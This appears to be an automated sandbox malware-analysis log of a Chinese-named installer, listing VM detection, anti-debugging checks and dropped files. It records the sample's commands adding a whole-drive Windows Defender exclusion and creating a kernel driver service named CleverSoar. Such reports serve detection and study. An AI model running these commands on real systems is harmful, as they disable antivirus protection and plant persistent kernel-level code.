Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5888Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3866Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpWindow / User API: threadDelayed 613Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpWindow / User API: threadDelayed 596Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpWindow / User API: threadDelayed 562Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-596QU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C77AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C77AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00896868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00896868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00897496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00897496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00899C60 GetSystemInfo,10_2_00899C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000002.2085306299.00000000011DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000002.2085306299.00000000011DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C603886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C603886
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C790181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C790181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009157D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_009157D0
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C799D66 mov eax, dword ptr fs:[00000030h]6_2_6C799D66
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C799D35 mov eax, dword ptr fs:[00000030h]6_2_6C799D35
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C78F17D mov eax, dword ptr fs:[00000030h]6_2_6C78F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C788CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C788CBD
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C790181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C790181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C857700 cpuid 6_2_6C857700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
